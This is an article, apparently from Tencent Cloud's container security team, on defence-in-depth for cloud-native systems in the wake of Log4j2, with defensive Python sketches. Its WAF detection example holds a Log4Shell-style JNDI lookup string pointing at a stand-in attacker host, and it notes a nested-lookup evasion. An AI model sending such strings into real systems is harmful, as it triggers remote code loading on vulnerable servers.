Security Construction and Security Operations under Cloud-Native Architecture from the Perspective of Major Vulnerability Emergency Response (Part 2)

Foreword

In the previous article, we briefly analyzed how to respond to and fix major security vulnerabilities quickly under a cloud-native architecture, as well as the challenges and advantages that the cloud-native architecture brings to this kind of security emergency. Now that the incident is over, we need to reflect on the pain and think systematically about how to carry out effective security construction and security operations for cloud-native architecture, so that we can handle future security incidents with ease.

Tencent Cloud Container Service (TKE) currently runs the largest Kubernetes cluster in China, covering application scenarios including games, payments, live streaming, and finance. The stable operation of the cluster is inseparable from the security capabilities that safeguard it. Tencent Cloud Container Security Service (TCSS) tracks the industry's most cutting-edge cloud-native security perspectives, provides continuous guidance for TKE's security governance, and has accumulated rich experience and best practices.

This article draws on our own security construction and security operation practices to share, in a systematic way, our thoughts on both under the cloud-native architecture.

Security Construction and Security Operation under Cloud Native Architecture

Security operations are the goal, and security capabilities are the means. The two are closely related. Security capability building is the foundation of security operations: as the saying goes, even the best cook cannot prepare a meal without rice. Better security capabilities make security operations smoother, and security operations in turn provide input and feedback that make security detection and protection capabilities more accurate.

Building and operating security capabilities under the cloud-native architecture is a big topic, and space limitations mean this article cannot cover it fully. This article focuses on the typical scenario of the Log4j2 vulnerability and analyzes, from the perspective of security operations, which security capabilities are essential to build.

Traditional security capability building is essential

The first thing to note is that container security and cloud-native security, as we use the terms, are relatively narrow concepts. They usually cover only the detection of and protection against the security risks that are unique to the cloud-native architecture. We have always emphasized that the security risks under the cloud-native architecture are incremental: they are added on top of the existing ones. The overall security construction must therefore be a defense-in-depth system, not something a single product can accomplish.

Examples include WAF, firewall, and anti-DDoS capabilities at the ingress and egress of north-south traffic. If the cloud-native platform is built on IaaS, then VPC isolation and intrusion detection, and even network tiering and zoning at the underlay level, are all foundations of cloud-native security construction.

In the emergency response to the Log4j2 vulnerability, we also found that even in a container environment, upgrading WAF rules, updating firewall outbound policies, and similar measures can mitigate and block the vulnerability to a certain degree at the earliest moment.
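
As a rough illustration of what a first-response WAF rule for this vulnerability might check, the sketch below flags request fields that contain the start of a JNDI lookup. The pattern and the function name looks_like_jndi_lookup are assumptions made for this example, not the rules of any particular WAF product.

```python
import re
from urllib.parse import unquote

# Hypothetical signature: the start of a JNDI lookup such as "${jndi:ldap://...}".
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def looks_like_jndi_lookup(value: str) -> bool:
    """Return True if a request field contains a plain or URL-encoded JNDI lookup."""
    decoded = unquote(value)  # undo one layer of percent-encoding
    return bool(JNDI_LOOKUP.search(decoded))


if __name__ == "__main__":
    print(looks_like_jndi_lookup("${jndi:ldap://attacker.example/a}"))
    print(looks_like_jndi_lookup("Mozilla/5.0"))
```

A signature this simple only buys time. Nested lookups such as ${${lower:j}ndi:...} are not matched by it, which is one reason the layered measures discussed in the rest of this article are still needed.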

The "Tencent Cloud Container Security White Paper", released by Tencent Cloud in November 2021, also proposes a layered container security framework. A very important part of that framework is basic security, which covers what traditional data center security and cloud security construction already include.

Security operations drive security capability building

For systematic security construction and security operations, several technical and standardization organizations have proposed standard frameworks, which offer important guidance and reference for our security construction. Here we take the cybersecurity framework proposed by NIST as the reference for our cloud-native security construction.

Following the NIST cybersecurity framework, we also divide cloud-native security construction into five steps that are both parallel and sequential: identification, protection, detection, response, and recovery.

Security identification

(1) Cluster asset identification

Security identification is mainly reflected in asset identification. The assets here include not only Kubernetes resource-level assets such as clusters, nodes, namespaces, pods, services, and containers, but also application-level assets such as image repositories and container images.

Under the cloud-native architecture, basic asset identification and inventory are not enough. It is also necessary to discover the logical relationships between resources and services among these assets. Then, once a new vulnerability is found in an image or an intrusion is detected, all related assets and personnel can be correlated and located automatically, so that the scope of impact and the responsible security owner are identified and the issue is handled quickly.
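
The correlation described above can be sketched as a lookup over an asset inventory. This is a minimal illustration only: the Workload record, its fields, and the impact_of_image function are hypothetical names, and a real inventory would be populated from the cluster API and the organization's ownership data.

```python
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Workload:
    """One running pod and the metadata needed to trace impact (hypothetical schema)."""
    cluster: str
    namespace: str
    pod: str
    image: str
    owner: str


def impact_of_image(inventory: List[Workload], image: str) -> Tuple[List[Workload], List[str]]:
    """Return every workload running the given image and the owners to notify."""
    affected = [w for w in inventory if w.image == image]
    owners = sorted({w.owner for w in affected})
    return affected, owners


if __name__ == "__main__":
    inventory = [
        Workload("prod", "pay", "pay-api-1", "registry.example/pay-api:1.4", "alice"),
        Workload("prod", "pay", "pay-api-2", "registry.example/pay-api:1.4", "alice"),
        Workload("prod", "live", "stream-1", "registry.example/stream:2.0", "bob"),
    ]
    affected, owners = impact_of_image(inventory, "registry.example/pay-api:1.4")
    print([w.pod for w in affected], owners)
```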

(2) Self-built container identification

Beyond identifying assets at the standard cluster level, asset identification also needs to adapt to relatively complex environments such as R&D systems. In an R&D environment there are self-built assets in addition to standard cluster-level ones. For example, users can start containers directly with commands such as docker run.

(3) Business risk identification

From the perspective of security operations, security identification is also reflected in business risk identification. We need to clearly classify the security risk levels for clusters and applications. For high-risk applications, higher-level security policies need to be adopted. For example, for core business systems, there must be strict network isolation and access control mechanisms, and for directly exposed services, there must be stricter permission control in the container dimension.

Security protection

After you have asset and business risk information, you need to rely on basic security protection capabilities to protect against known threats. The security protection here mainly includes two aspects:

(1) System hardening

• Configuration detection and repair

System hardening is a familiar topic, especially configuration inspection and security configuration hardening, but it is especially important under the cloud-native architecture. By design, a container shares the kernel with the host operating system, which gives container users more room to operate. The security of the configuration therefore greatly affects the security of the entire system.

As the main intrusion paths of the container environment show, one important path is attacking containers through the host, for example through the Docker Remote API. Security capabilities therefore need to include comprehensive configuration checks.

Although configuration hardening is an old problem, achieving complete coverage in a cloud-native environment is still relatively complicated. It includes not only hardening basic platforms and components such as Kubernetes, Docker, and Istio, but also hardening the configuration of the application software inside images, which is even harder to do. We will not expand on it here.

From the perspective of security operations, we need to harden the basic configuration based on the results of configuration inspection. An important point is the balance between security configuration and stable business operation: security must be fully enforced, yet the availability and stability of the business must not be affected. This requires adjusting the configuration strategy flexibly, in line with business characteristics and security configuration requirements, while hardening. It is a process of continuous revision and improvement.

• Vulnerability detection and remediation

Fixing known vulnerabilities is also an old topic, covering both host-level vulnerabilities and image vulnerabilities. For each detected vulnerability, whether to fix it and with what priority must be decided based on information such as its threat level and how difficult it is to exploit.
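
One simple way to turn that decision into something repeatable is a scoring function. The sketch below is an assumption-laden example: the Finding fields, the +2 weights, and the thresholds 11 and 7 are arbitrary values chosen for illustration and would need tuning against real operational data.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Finding:
    """A detected vulnerability with the context used for triage (hypothetical schema)."""
    cve: str
    severity: float          # CVSS-style base score, 0.0 to 10.0
    exploit_available: bool  # a public exploit is known, so exploitation is easier
    internet_exposed: bool   # the affected workload is reachable from outside


def score(f: Finding) -> float:
    """Combine threat level and ease of exploitation into one number."""
    return f.severity + (2.0 if f.exploit_available else 0.0) + (2.0 if f.internet_exposed else 0.0)


def priority(f: Finding) -> str:
    """Map a score to a handling decision. Thresholds are illustrative only."""
    s = score(f)
    if s >= 11.0:
        return "fix-now"
    if s >= 7.0:
        return "scheduled"
    return "defer"


def triage(findings: List[Finding]) -> List[Finding]:
    """Order findings so the most urgent come first."""
    return sorted(findings, key=score, reverse=True)


if __name__ == "__main__":
    log4shell = Finding("CVE-2021-44228", 10.0, True, True)
    print(priority(log4shell))
```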

• Image security assessment and repair

As the source of cloud-native applications, container images need security assessment in more dimensions than vulnerabilities alone. At a minimum, the assessment should include: detection of sensitive information in images, to ensure that it is not leaked; detection of malicious files such as viruses and Trojans, mainly for public images of uncertain origin; and compliance checks on how the image is built, such as whether COPY or ADD is used.

In addition to detecting and fixing the image risks above, security operations also need to clean up zombie images, both in image registries and on cluster nodes. This plays an important role in reducing the attack surface.

At the same time, image detection needs to support custom rules. Different organizations and users, and images for different types of services, have different security requirements. So in addition to a general set of detection and evaluation rules, image security assessment must support user-defined rules, so that different rules can be applied flexibly to different images based on the business risk identification described above.
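
The idea of general rules plus user-defined rules can be sketched as a small Dockerfile checker in which every rule is just a function. The rule names and regular expressions here are assumptions for illustration and are far from a complete scanner. The ADD check reflects the fact that ADD can also extract local archives and fetch remote URLs, while COPY only copies files.

```python
import re
from typing import Callable, List, Optional, Tuple

# A rule inspects one Dockerfile line and returns a message, or None if the line is fine.
Rule = Callable[[str], Optional[str]]


def rule_prefer_copy(line: str) -> Optional[str]:
    """Build compliance: flag ADD, which does more than a plain file copy."""
    if re.match(r"\s*ADD\s", line, re.IGNORECASE):
        return "ADD used; prefer COPY unless extraction or a URL fetch is intended"
    return None


def rule_no_inline_secrets(line: str) -> Optional[str]:
    """Sensitive information: flag ENV/ARG names that look like credentials."""
    if re.match(r"\s*(ENV|ARG)\s+\S*(PASSWORD|SECRET|TOKEN)", line, re.IGNORECASE):
        return "possible credential baked into the image"
    return None


DEFAULT_RULES: List[Rule] = [rule_prefer_copy, rule_no_inline_secrets]


def scan_dockerfile(text: str, rules: List[Rule]) -> List[Tuple[int, str]]:
    """Apply every rule to every line and return (line number, message) pairs."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule in rules:
            message = rule(line)
            if message:
                findings.append((lineno, message))
    return findings


if __name__ == "__main__":
    dockerfile = "FROM alpine:latest\nADD app.tar.gz /app/\nENV DB_PASSWORD=hunter2\n"
    for lineno, message in scan_dockerfile(dockerfile, DEFAULT_RULES):
        print(lineno, message)
```

A team with stricter requirements could append its own function to the rule list, for example one that rejects a FROM line ending in :latest, without touching the general rules.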

• Risk Management

In terms of operation management, for the above-mentioned risk information such as configuration and vulnerabilities, a complete set of closed-loop risk management processes is required to ensure that the identification, repair and confirmation of risks are fully realized.

(2) Security protection

In addition to system hardening, the security protection stage should prevent attacks along known possible intrusion paths at different levels, through the relevant protection capabilities and protection policies.

• Admission Control

As the name implies, admission control means controlling and blocking at different stages of the full life cycle of a cloud-native application according to security requirements, so as to achieve the security goal. It is also a basic requirement of DevSecOps. With its flexible resource management and automated application orchestration, the cloud-native architecture makes such security control convenient. The value of admission control lies, on the one hand, in preventing security risks; on the other hand, when a major zero-day such as Log4j2 breaks out, admission control can be used to contain the impact quickly and prevent new risks from being introduced.

From the perspective of the life cycle, admission control needs to be implemented in two stages: development (dev) and runtime (ops). Admission in the development stage mainly means detecting security risks such as vulnerabilities and sensitive information at stages such as CI and pushing to the image registry. The admission conditions here usually need to cover the hardening items mentioned above.

Admission control at runtime applies mainly when the application is deployed and run. Only containers and pods that meet the security requirements are allowed to start. The admission conditions here usually include checks on resource limits and on permission restrictions such as syscalls and capabilities.
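
A runtime admission check of this kind can be sketched as a function over a pod manifest. The dictionary layout follows the Kubernetes Pod spec (resources.limits, securityContext.privileged, securityContext.capabilities.add), but the function name admission_violations and the DANGEROUS_CAPS set are assumptions for this example. In a real cluster such logic would typically sit behind a validating admission webhook or a policy engine.

```python
from typing import Any, Dict, List

# Capabilities this example refuses to grant; the selection is illustrative.
DANGEROUS_CAPS = {"SYS_ADMIN", "NET_ADMIN", "SYS_PTRACE"}


def admission_violations(pod: Dict[str, Any]) -> List[str]:
    """Return the reasons a pod should be rejected; an empty list means admit."""
    violations = []
    for container in pod.get("spec", {}).get("containers", []):
        name = container.get("name", "<unnamed>")

        # Resource restriction check: both CPU and memory limits must be set.
        limits = container.get("resources", {}).get("limits", {})
        for resource in ("cpu", "memory"):
            if resource not in limits:
                violations.append(f"{name}: missing {resource} limit")

        # Permission restriction checks: privileged mode and added capabilities.
        security = container.get("securityContext", {})
        if security.get("privileged", False):
            violations.append(f"{name}: privileged container")
        added = set(security.get("capabilities", {}).get("add", []))
        for cap in sorted(added & DANGEROUS_CAPS):
            violations.append(f"{name}: capability {cap} not allowed")
    return violations


if __name__ == "__main__":
    pod = {"spec": {"containers": [{"name": "app", "securityContext": {"privileged": True}}]}}
    print(admission_violations(pod))
```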

Likewise, from an operational point of view, admission control rules need more than standard defaults: they must also be flexibly adjustable and improvable according to the application.

• Runtime interception

Containers under the cloud-native architecture carry microservice applications, so in theory they should not execute high-privilege instructions. Although admission control already provides a certain degree of prevention, we also need runtime security capabilities to intercept high-risk operations inside containers, such as high-risk commands and high-risk system calls, to achieve defense in depth across different dimensions.

• Network isolation

Lateral movement is what an attacker does after the initial compromise succeeds, in what is also called the post-exploitation phase. Cloud-native networks usually apply no network isolation by default. It is therefore necessary to design and enforce a complete network isolation mechanism that isolates different services from one another.

Networks under the cloud-native architecture are organized differently from traditional host-based or virtual-machine-based networks. In Kubernetes, the smallest unit of the network is the Pod, and the Pod carries the service container. Because Pod IP addresses change as Pods are created and destroyed, traditional network policies based on IP addresses and ports no longer fit. We need to implement network isolation at different granularities based on resources such as labels and services.
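
Label-based isolation can be sketched as a small policy evaluator. The Policy class and is_allowed function are hypothetical and cover ingress only. The default mirrors Kubernetes NetworkPolicy behavior, where a pod is not isolated until at least one policy selects it.

```python
from dataclasses import dataclass, field
from typing import Dict, List

Labels = Dict[str, str]


def matches(selector: Labels, labels: Labels) -> bool:
    """A selector matches when every key/value pair it names is present on the pod."""
    return all(labels.get(key) == value for key, value in selector.items())


@dataclass
class Policy:
    """Ingress policy: pods matching `target` accept traffic only from `allow_from`."""
    target: Labels
    allow_from: List[Labels] = field(default_factory=list)


def is_allowed(src: Labels, dst: Labels, policies: List[Policy]) -> bool:
    """Decide whether traffic from a pod labeled `src` may reach a pod labeled `dst`."""
    selecting = [p for p in policies if matches(p.target, dst)]
    if not selecting:
        return True  # no policy selects the destination, so it is not isolated
    return any(matches(sel, src) for p in selecting for sel in p.allow_from)


if __name__ == "__main__":
    policies = [Policy(target={"app": "db"}, allow_from=[{"app": "api"}])]
    print(is_allowed({"app": "api"}, {"app": "db"}, policies))
    print(is_allowed({"app": "web"}, {"app": "db"}, policies))
```

Because the decision depends only on labels, it stays valid when pods are rescheduled and their IP addresses change.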

• Protection policy management

In operation, deciding how to set policies for admission control, runtime interception, network isolation, and so on is a headache, because it is hard for security administrators, operations administrators, and even developers to know exactly how these rules should be configured to reach the most secure state achievable.

This is a challenge for security operations under the cloud-native architecture, but the architecture itself also offers an advantage in addressing it. As mentioned earlier, an important feature of cloud-native architecture is immutable infrastructure. This means we can automatically learn a security baseline from business characteristics and historical runtime data, using techniques such as whitelisting and behavioral models. This baseline then becomes an important reference for configuring the various protection policies.
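
The whitelisting approach can be sketched as follows, assuming runtime events arrive as (image, process name) pairs. The event shape and the function names are hypothetical. The baseline is keyed by image because, with immutable infrastructure, every container started from the same image is expected to behave the same way.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

Event = Tuple[str, str]  # (image, process name)


def learn_baseline(history: Iterable[Event]) -> Dict[str, Set[str]]:
    """Build a per-image whitelist of processes seen during the learning period."""
    baseline: Dict[str, Set[str]] = defaultdict(set)
    for image, process in history:
        baseline[image].add(process)
    return dict(baseline)


def deviations(baseline: Dict[str, Set[str]], events: Iterable[Event]) -> List[Event]:
    """Return the events whose process was never seen for that image."""
    return [(image, process) for image, process in events
            if process not in baseline.get(image, set())]


if __name__ == "__main__":
    history = [("pay-api:1.4", "java"), ("pay-api:1.4", "sh"), ("nginx:1.25", "nginx")]
    baseline = learn_baseline(history)
    print(deviations(baseline, [("pay-api:1.4", "java"), ("nginx:1.25", "curl")]))
```

The learned sets can be reviewed by an administrator and then used as the starting point for runtime interception rules, instead of writing those rules from scratch.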

Security detection

Security is always a contest between attack and defense, and the defender is often at a relative disadvantage. It can even be said that no system is unbreakable.

Under the cloud-native architecture, services are becoming more open and complex, and attackers' methods more numerous and diverse. The defense and interception measures described above can hardly cope with every threat. Advanced targeted attacks, or 0-day attacks such as the one against Log4j2, can often bypass the various defenses, which makes such threats hard to guard against.

Therefore, even with all of the above defense and interception measures in place, the cloud-native system still needs continuous runtime monitoring and security detection. Based on the characteristics of the cloud-native architecture, security detection is organized here along the following dimensions.

1) Threat detection at the system dimension

It mainly focuses on behavior inside containers, such as detecting abnormal processes, abnormal files, and abnormal users. This fine-grained anomaly detection can uncover attacks such as privilege escalation and cryptomining.

Threat detection in the network dimension mainly targets lateral movement in the post-exploitation stage. Although strict access control policies are set in the protection stage, lateral movement within the range the network still allows remains a significant security threat. Network threat detection has two main aspects. On the one hand, from the perspective of network behavior, flow-based anomaly detection on network traffic, especially east-west traffic, plays an important role in detecting network threats (NDR). On the other hand, from the perspective of data packets, abnormal packets on the network between containers are analyzed to implement intrusion detection for the container network (NIDS).
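
As one small example of flow-based detection on east-west traffic, the sketch below flags source pods that contact an unusually large number of distinct peers within a time window, which is a common sign of internal scanning. The flow tuple shape, the function name, and the fixed threshold are assumptions. Real NDR systems use far richer features and learned thresholds.

```python
from collections import defaultdict
from typing import Dict, Iterable, Set, Tuple

Flow = Tuple[str, str, int]  # (source pod, destination pod, destination port)


def fan_out_anomalies(flows: Iterable[Flow], max_peers: int) -> Dict[str, int]:
    """Return sources that reached more than `max_peers` distinct (destination, port) pairs."""
    peers: Dict[str, Set[Tuple[str, int]]] = defaultdict(set)
    for src, dst, port in flows:
        peers[src].add((dst, port))
    return {src: len(seen) for src, seen in peers.items() if len(seen) > max_peers}


if __name__ == "__main__":
    window = [("web-1", "api-1", 8080), ("web-1", "api-1", 8080)]
    # A compromised pod probing many services on the same port.
    window += [("job-7", f"svc-{i}", 6379) for i in range(20)]
    print(fan_out_anomalies(window, max_peers=5))
```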

2) Application-dimensional threat detection

It also targets lateral movement in the post-exploitation stage. With the microservice architecture of the cloud-native era, network communication between containers consists of a large number of API calls, and ensuring that all of these calls are secure is of great significance to the security of cloud-native applications. For example, from a compromised container an attacker may obtain the data of other services through their APIs, or attack related services by constructing malicious parameters. It is therefore necessary to detect anomalies in API calls at the application dimension, including calling behavior, calling path, and calling parameters.

Security Response

Security response mainly refers to the disposal measures taken in response to the alarms raised by security detection in the previous step. For security response under the cloud-native architecture, especially at the network security level, we prefer out-of-band (bypass) detection followed by response handling, rather than the inline detect-and-block approach of IPS and WAF in traditional network security. This design is chosen mainly for the sake of business performance.

Threat response mainly includes two aspects:

(1) Disposal

Alarms can be responded to by isolating the network, pausing containers, stopping abnormal processes, or destroying containers. There is one prerequisite: because containers have short life cycles, complete logging and tracing must be implemented when security capabilities are built, so that traceability analysis and forensics remain possible after disposal.

During disposal, for anomalies that are certain, disposal operations such as one-click blocking and one-click isolation can be automated to reduce operating costs.
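
The disposal logic above can be sketched as a small playbook. The alert type names, the mapping to actions, and the 0.9 threshold are all hypothetical. The plan always begins with evidence collection, since a short-lived container may be gone before forensics starts, and it automates the action only for high-confidence alerts.

```python
from enum import Enum
from typing import Dict, List


class Action(Enum):
    ISOLATE_NETWORK = "isolate_network"
    STOP_PROCESS = "stop_process"
    PAUSE_CONTAINER = "pause_container"
    DESTROY_CONTAINER = "destroy_container"
    MANUAL_REVIEW = "manual_review"


# Illustrative mapping from alert type to automated action.
PLAYBOOK: Dict[str, Action] = {
    "reverse_shell": Action.ISOLATE_NETWORK,
    "cryptominer": Action.STOP_PROCESS,
    "container_escape": Action.PAUSE_CONTAINER,
    "malicious_image": Action.DESTROY_CONTAINER,
}


def response_plan(alert_type: str, confidence: float, auto_threshold: float = 0.9) -> List[str]:
    """Return the ordered steps for an alert: evidence first, then the disposal step."""
    steps = ["collect_evidence"]  # preserve logs and traces before anything is destroyed
    if confidence >= auto_threshold and alert_type in PLAYBOOK:
        steps.append(PLAYBOOK[alert_type].value)
    else:
        steps.append(Action.MANUAL_REVIEW.value)  # uncertain or unknown: leave it to a human
    return steps


if __name__ == "__main__":
    print(response_plan("cryptominer", 0.95))
    print(response_plan("cryptominer", 0.50))
```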

(2) Traceability

Based on the container's alarm, log, and trace data and correlation analysis across that data, the alarm can be traced back to its source, the attack chain clarified, and the cause of the intrusion determined.

Security repair

The security repair phase mainly includes two aspects: on the one hand, hardening and fixing the relevant risks according to the cause of the intrusion; on the other hand, feeding what was learned back into the protection and detection capabilities.

Summary

More than a month has passed since the Log4j2 vulnerability broke out, and we believe most of the patches that needed to be applied have been applied. Should this sudden emergency make us rethink security construction and security operations under the cloud-native architecture? Vulnerabilities and intrusions are difficult to predict, and we do not know when the next one will come, so we need to ask ourselves whether we could deal with it calmly.

I hope the thinking in this article can bring some ideas and help to cloud native security construction. If you have any suggestions or questions, please leave a message at the end of the article.
